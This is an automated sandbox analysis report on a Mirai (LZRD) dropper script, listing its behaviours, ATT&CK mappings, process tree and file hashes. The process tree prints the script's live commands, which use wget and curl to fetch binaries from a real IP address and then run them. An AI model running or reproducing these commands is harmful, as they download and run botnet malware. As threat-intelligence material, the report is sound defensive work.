mirai | 8aa5a26c3c99eb1c6b59b1396880545253b62746117a2f122c658acf3b418433

Analysis

max time kernel
148s
max time network
150s
platform
debian-9_armhf
resource
debian9-armhf-20240729-en
resource tags

arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
26/03/2025, 23:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ohshit.sh
Size

3KB
MD5

3b746c5758c3e8191384e8e28cadd0ae
SHA1

cf7164adbb686ad45e8512dd2660fc1124794566
SHA256

8aa5a26c3c99eb1c6b59b1396880545253b62746117a2f122c658acf3b418433
SHA512

70afe1a6a19dcb83b449351b25ea414a3c6e54e4249d637f4b8026aa0b5cf972b5da0ec374d72c1cb43349475d66829253b4f95c6709fbd26e925e995f5f73bf

Score

10^/10

mirai lzrd antivm botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 15 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
771	chmod
777	chmod
807	chmod
820	chmod
845	chmod
752	chmod
790	chmod
838	chmod
765	chmod
784	chmod
688	chmod
723	chmod
800	chmod
832	chmod
851	chmod

Executes dropped EXE 15 IoCs

ioc	pid	Process
/tmp/Chaotic	689	ohshit.sh
/tmp/Chaotic	724	ohshit.sh
/tmp/Chaotic	754	ohshit.sh
/tmp/Chaotic	766	ohshit.sh
/tmp/Chaotic	772	ohshit.sh
/tmp/Chaotic	778	ohshit.sh
/tmp/Chaotic	785	ohshit.sh
/tmp/Chaotic	791	ohshit.sh
/tmp/Chaotic	801	ohshit.sh
/tmp/Chaotic	808	ohshit.sh
/tmp/Chaotic	821	ohshit.sh
/tmp/Chaotic	833	ohshit.sh
/tmp/Chaotic	839	ohshit.sh
/tmp/Chaotic	846	ohshit.sh
/tmp/Chaotic	852	ohshit.sh

Modifies Watchdog functionality 1 TTPs 6 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic

Enumerates running processes
Discovers information about currently running processes on the system

Writes file to system bin folder 6 IoCs

description	ioc	Process
File opened for modification	/sbin/watchdog	Chaotic
File opened for modification	/bin/watchdog	Chaotic
File opened for modification	/sbin/watchdog	Chaotic
File opened for modification	/bin/watchdog	Chaotic
File opened for modification	/sbin/watchdog	Chaotic
File opened for modification	/bin/watchdog	Chaotic

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/fstream-5.dat	upx
behavioral2/files/fstream-6.dat	upx
behavioral2/files/fstream-7.dat	upx
behavioral2/files/fstream-8.dat	upx

Checks CPU configuration 1 TTPs 15 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/145/status	Chaotic
File opened for reading	/proc/309/status	Chaotic
File opened for reading	/proc/8/status	Chaotic
File opened for reading	/proc/593/status	Chaotic
File opened for reading	/proc/284/status	Chaotic
File opened for reading	/proc/19/status	Chaotic
File opened for reading	/proc/16/status	Chaotic
File opened for reading	/proc/28/status	Chaotic
File opened for reading	/proc/43/status	Chaotic
File opened for reading	/proc/159/status	Chaotic
File opened for reading	/proc/804/status	Chaotic
File opened for reading	/proc/215/status	Chaotic
File opened for reading	/proc/296/status	Chaotic
File opened for reading	/proc/27/status	Chaotic
File opened for reading	/proc/796/status	Chaotic
File opened for reading	/proc/2/status	Chaotic
File opened for reading	/proc/796/status	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/21/status	Chaotic
File opened for reading	/proc/9/status	Chaotic
File opened for reading	/proc/109/status	Chaotic
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/137/status	Chaotic
File opened for reading	/proc/3/status	Chaotic
File opened for reading	/proc/42/status	Chaotic
File opened for reading	/proc/76/status	Chaotic
File opened for reading	/proc/295/status	Chaotic
File opened for reading	/proc/215/status	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/108/status	Chaotic
File opened for reading	/proc/794/status	Chaotic
File opened for reading	/proc/268/status	Chaotic
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/573/status	Chaotic
File opened for reading	/proc/586/status	Chaotic
File opened for reading	/proc/135/status	Chaotic
File opened for reading	/proc/165/status	Chaotic
File opened for reading	/proc/139/status	Chaotic
File opened for reading	/proc/165/status	Chaotic
File opened for reading	/proc/self/exe	Chaotic
File opened for reading	/proc/19/status	Chaotic
File opened for reading	/proc/20/status	Chaotic
File opened for reading	/proc/593/status	Chaotic
File opened for reading	/proc/9/status	Chaotic
File opened for reading	/proc/22/status	Chaotic
File opened for reading	/proc/26/status	Chaotic
File opened for reading	/proc/76/status	Chaotic
File opened for reading	/proc/589/status	Chaotic
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/98/status	Chaotic
File opened for reading	/proc/794/status	Chaotic
File opened for reading	/proc/593/status	Chaotic
File opened for reading	/proc/159/status	Chaotic
File opened for reading	/proc/24/status	Chaotic
File opened for reading	/proc/271/status	Chaotic
File opened for reading	/proc/22/status	Chaotic
File opened for reading	/proc/42/status	Chaotic
File opened for reading	/proc/11/status	Chaotic
File opened for reading	/proc/14/status	Chaotic
File opened for reading	/proc/284/status	Chaotic
File opened for reading	/proc/791/status	Chaotic
File opened for reading	/proc/145/status	Chaotic
File opened for reading	/proc/1/status	Chaotic
File opened for reading	/proc/794/status	Chaotic

System Network Configuration Discovery 1 TTPs 6 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
774	wget
775	curl
776	cat
768	wget
769	curl
770	cat

Writes file to tmp directory 30 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm	curl
File opened for modification	/tmp/Chaotic	ohshit.sh
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86_64	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86_64	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.i686	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mpsl	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm5	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm6	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm7	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm5	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm7	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.ppc	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.m68k	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.m68k	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.sparc	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.sh4	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.i686	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mips64	curl
File opened for modification	/tmp/busybox	cp
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arc	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.sh4	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mips	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mpsl	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arc	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mips	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm6	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.ppc	wget

/tmp/ohshit.sh
/tmp/ohshit.sh
1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:639
- /bin/cp
  cp /bin/busybox /tmp/
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:641
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  - Writes file to tmp directory
  PID:645
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:670
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  PID:687
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-3f06e9d4f70b43a0af54b755c961002a-systemd-timedated.service-OOVSCN ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  - File and Directory Permissions Modification
  PID:688
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:689
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  - Writes file to tmp directory
  PID:692
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:708
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  PID:722
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-3f06e9d4f70b43a0af54b755c961002a-systemd-timedated.service-OOVSCN ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  - File and Directory Permissions Modification
  PID:723
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:724
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - Writes file to tmp directory
  PID:726
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:735
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  PID:751
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-3f06e9d4f70b43a0af54b755c961002a-systemd-timedated.service-OOVSCN ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:752
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:754
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.i686
  2⤵
  - Writes file to tmp directory
  PID:756
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.i686
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:763
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.i686
  2⤵
  PID:764
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-3f06e9d4f70b43a0af54b755c961002a-systemd-timedated.service-OOVSCN ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:765
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:766
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:768
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips
  2⤵
  - Checks CPU configuration
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:769
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.mips
  2⤵
  - System Network Configuration Discovery
  PID:770
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-3f06e9d4f70b43a0af54b755c961002a-systemd-timedated.service-OOVSCN ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:771
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:772
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips64
  2⤵
  - System Network Configuration Discovery
  PID:774
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips64
  2⤵
  - Checks CPU configuration
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:775
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.mips64
  2⤵
  - System Network Configuration Discovery
  PID:776
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-3f06e9d4f70b43a0af54b755c961002a-systemd-timedated.service-OOVSCN ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:777
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:778
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.mpsl
  2⤵
  - Writes file to tmp directory
  PID:779
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.mpsl
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:780
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.mpsl
  2⤵
  PID:783
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-3f06e9d4f70b43a0af54b755c961002a-systemd-timedated.service-OOVSCN ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:784
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:785
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm
  2⤵
  - Writes file to tmp directory
  PID:787
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:788
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arm
  2⤵
  PID:789
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-3f06e9d4f70b43a0af54b755c961002a-systemd-timedated.service-OOVSCN ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:790
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:791
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm5
  2⤵
  - Writes file to tmp directory
  PID:797
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm5
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:798
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arm5
  2⤵
  PID:799
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-3f06e9d4f70b43a0af54b755c961002a-systemd-timedated.service-OOVSCN ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:800
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:801
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm6
  2⤵
  - Writes file to tmp directory
  PID:802
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm6
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:805
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arm6
  2⤵
  PID:806
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-3f06e9d4f70b43a0af54b755c961002a-systemd-timedated.service-OOVSCN ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:807
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:808
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm7
  2⤵
  - Writes file to tmp directory
  PID:817
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm7
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:818
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arm7
  2⤵
  PID:819
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:820
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:821
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.ppc
  2⤵
  - Writes file to tmp directory
  PID:829
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.ppc
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:830
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.ppc
  2⤵
  PID:831
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:832
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:833
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.sparc
  2⤵
  PID:835
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.sparc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:836
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.sparc
  2⤵
  PID:837
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:838
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:839
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.m68k
  2⤵
  - Writes file to tmp directory
  PID:840
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.m68k
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:841
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.m68k
  2⤵
  PID:844
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.m68k ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:845
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:846
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.sh4
  2⤵
  - Writes file to tmp directory
  PID:848
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.sh4
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:849
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.sh4
  2⤵
  PID:850
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.m68k ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sh4 ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:851
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:852

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/Chaotic

Filesize
37KB

MD5
30cd627f38ed8d3f4d88f70db155f6e4

SHA1
dac9a3568bf25a78f8f452f13ee5324c06e0e697

SHA256
6f1da6623189a369e919942eda96a280333476c065f7f52dc104835e7784c7b0

SHA512
bb9292720ffb56044b193ae917ffc81cfd690a5b1ef9e43e87765d9dc15111e401a7a82e7210014c96adce42beace4a803d8fa132e55f0a7687627b734620c6a

Download Submit
/tmp/Chaotic

Filesize
36KB

MD5
d9f6dcc3340583536c2c78cedbd66e7f

SHA1
d26bd4c263708c093614e629c41377a6d4869995

SHA256
5021c7b20ca08e98a7b36461d82a486acd1528890d8e3fa575a6df9ecbf5c6a7

SHA512
dcd0e366076600ca848bbb3129ff06e556fa12bc98c9858ea7ce5945f77695227b538d62d019b7582c3120ec8ce6622375bfaaa9514fdae8df25b49581c85711

Download Submit
/tmp/Chaotic

Filesize
37KB

MD5
ba44f08a5539f2ff023791d8fa5971ad

SHA1
e9ee840954010d76206bb79deaa187a020ba175b

SHA256
b5292146e8ab7b2454b1bb45370acf1a2f8ed9f315e3b59fd8c5752dd57f8b16

SHA512
15682f1f3b24a1848e82fa71a9c65a7dcd6b0dc2d2c162ae7653c335306bce13194db9532a5ced94b9798cdf36f27880c9530e0666a9185bd5dcec18f852882f

Download Submit
/tmp/Chaotic

Filesize
43KB

MD5
dfca537c507ed591e9a28dc15097cfef

SHA1
cd438b650795af3bbc91243600590ab955d66b33

SHA256
97aa2a737bc4a8f77afece3a67900da159063972bca6e153effdc8617972bfcc

SHA512
7753f242b840b6f815278f4f693eeea586444212e080fef40f510b85e47e604e4e0e8f65e00e81a775826827428f963d9f77f7a8e6c7c0986ffda4a5867274b2

Download Submit
/tmp/Chaotic

Filesize
95KB

MD5
15224bade89c1727c7151906feefeef3

SHA1
d8699054e4ad771025c789c93d9f0657f3e2c177

SHA256
c4a92d23b12a594223d79407c1b90a09b7ae8716731e57c4ee1f523e59facd2b

SHA512
9a3a62ae84a7590919f6c7769e728d0c75e2302c457e62bb6c2ac65823419b22ace15fdc8ca7be22a6e87903c7fc99527647e3151e44a86001a23b92bb852691

Download Submit
/tmp/busybox

Filesize
507KB

MD5
e588bcf03ae78237b58899d35f50c570

SHA1
2194732ebbefbc27bdae876c77f2a97a20175710

SHA256
2dd1fbb8052a89f40c2e9af115d31346e554ee746e9c7a97d651e43e0609df88

SHA512
904d906ec73ba5f828ee453acfceaf60d07b337a4baf1a88a2edba8d4568e4a3ceae2e24116af0a5b9c8ad194faa72abb62a72d30ae236b0852827c7bf896555

Download Submit
/tmp/ub8ehJSePAfc9FYqZIT6.arc

Filesize
113KB

MD5
5aaaec2c2edead8e37df9a743a4376f1

SHA1
6510eaf91c6a8e43b76c7cc4c8f67da5e8869cc2

SHA256
8accc9c4f37d8abe5bfe886162ca52aaf6b1ab4f21583126f235cfffe450dba2

SHA512
d1a5d33047fa2d2e9d8ec976f4099d182deb38415f899231b38c15502f56923c8a3efe08d8786960ba9c5a4f62d880e14b081e66feadc3948f2f523557242318

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads